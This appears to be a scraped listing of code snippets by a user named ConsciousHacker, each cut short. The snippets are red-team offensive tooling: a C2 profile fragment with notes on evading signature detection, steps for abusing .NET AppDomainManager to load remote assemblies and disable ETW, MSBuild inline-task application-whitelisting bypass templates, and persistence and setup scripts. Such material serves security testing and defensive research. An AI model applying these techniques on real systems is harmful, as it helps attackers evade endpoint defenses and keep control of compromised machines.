ConsciousHacker

Write-Host "
==============================================================================================================================
*Deploy an Enforced 'Scan' Windows Defender Application Control (WDAC)/Device Guard Policy with Code Integrity (UMCI) 

*Focus: Permit signed applications at the PCACertificate level (e.g. Microsoft signed).
*For Testing on Windows 10/11 Business/Enterprise - Downloads and merges the WDAC Bypass Rules with a scan policy
*System reboots when PowerShell script finishes
*Run as a privileged user in high integrity
*To remove enforcement, comment out enforce line

ConsciousHacker

# in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures)
# as stage0, remote injecting a thread into a suspended process works

set host_stage "false";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62";
set sleeptime "10000";

stage {
  set allocator "MapViewOfFile";
  set name "notevil.dll";

ConsciousHacker

This is a variation of the technique originally discovered by subtee and described here

TL;DR It essentially allows you to turn any .NET application into a lolbin by providing a configuration file and specifying the <appDomainManagerAssembly> element pointing to a specially crafted .NET assembly which executes when the application is loaded.

This variation allows you to load the AppDomainManager assembly from a UNC path or HTTP(s) server. Also disables ETW thanks to the <etwEnable> element :)

1. Copy some binary you love to say, C:\Test. Lets use aspnet_compiler.exe as an example
2. Compile test.cs to test.dll with a signed strong name, this is required to load an assembly outside of a .NET applications base directory.
3. Host test.dll on a remote SMB or HTTP(S) server

ConsciousHacker

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace BlockDllTest
{
    class Program
    {
        static void Main(string[] args)
        {

ConsciousHacker

<html>
<img id="HoneyBadger" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABAAAAAKtCAIAAAA2LYveAAAACXBIWXMAAA7zAAAO8wEcU5k6AAAAEXRFWHRUaXRsZQBQREYgQ3JlYXRvckFevCgAAAATdEVYdEF1dGhvcgBQREYgVG9vbHMgQUcbz3cwAAAALXpUWHREZXNjcmlwdGlvbgAACJnLKCkpsNLXLy8v1ytISdMtyc/PKdZLzs8FAG6fCPGXryy4AAovrklEQVR42ty9i5bjSJIsFgGAZGZWVnX1vFa60tmj/z/6CR19ymp1R3dmerrrkZl8ACFztwiH40kwM6tnJW5PLZMEgXghYO5ubh7/z//jfw8hxOELn1RVFeZedZBvU0r2iX8/ffFs09fSr6qY1o+fXLqz9/yK/3ZdZ+8H/3Yn+9NeK5eIYTfbWfbLfm7dvHQt39tI2ldx8uL5l8Z/cFg5Cfu1MBRz81Kt9W7uPNG3x/d0dl7asDb76/M4bfP0yLbM49Jho3a2C+ttaR0uvTDO/if9RLcd3nT6Gk3c7Hl27vM4eT9dnzzlaApWzhAXzs8/67qu9GVfHbt73Nl1HSv8l7q2O3btpW3P6A5WirShi2WkZQdomtPsDdK27agB/PZY53VbxUav3OjVK/7ZNHv8o8s+H3Zpa54BDcA5bXnjYH9z8b1OyvPlcsF7fti2id3UraPe6atpGn6FI4/P3/EnD8D5tUfywq9affFU1oUmHvNC0hdbUsurmV9XOhQ8Unpdc6m0bD+6Jf/Grp/xC4elYpfxwsHlXN1wPejnqSlLBWfBDFW4QVOsOu7DEbPI3kXsPDjb8dxyQPDv+Xw+nS7YsXe7g05nbJrdfr9v6n3u/uXy9PKNS/3u7u5wOKCvGDR88/z8HEOtUyYvncQaDau6c3kSVFxdsmGkqk3dk77w+ePj44cPH5qd7JzpdNQ+5hfOjFbhX1xOxrSRUcUnuNzxeMSlcSg+5ySi

ConsciousHacker

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
	<Target Name="Hello" >

	<!-- Call ANY .NET API -->
	<!-- 
	
		Author: Casey Smith, Twitter: @subTee
		 
		License: BSD 3-Clause
	

ConsciousHacker

root@kali:/opt/GreatSCT/setup# ./setup.sh 
 ==========================================================================
                  GreatSCT (Setup Script) | [Updated]: 2018-01-21
 ==========================================================================
  [Web]: https://github.com/GreatSCT/GreatSCT | [Twitter]: @ConsciousHacker
 ==========================================================================

Debug:      userhomedir = /root
Debug:          rootdir = /opt/GreatSCT
Debug:         trueuser = root

ConsciousHacker

function Install-ScheduledTask {

    <#
    .SYNOPSIS
        Install a scheduled task using Schedule.Service COM object.
    .DESCRIPTION
        This function installs a scheduled task using Schedule.Service COM object.
    .PARAMETER TaskPath
        String. The path of the task.
    .PARAMETER TaskName

ConsciousHacker

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
   <!-- Author: Casey Smith, Twitter: @subTee -->
  <!-- License: BSD 3-Clause -->
  <PropertyGroup>
      <FunctionName Condition="'$(FunctionName)' == ''">None</FunctionName>
      <Cmd Condition="'$(Cmd)' == ''">None</Cmd>
    </PropertyGroup>
  <Target Name="Hello">

ConsciousHacker

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
   <!-- Author: Casey Smith, Twitter: @subTee -->
  <!-- License: BSD 3-Clause -->
  <PropertyGroup>
      <FunctionName Condition="'$(FunctionName)' == ''">None</FunctionName>
      <Cmd Condition="'$(Cmd)' == ''">None</Cmd>
    </PropertyGroup>
  <Target Name="Hello">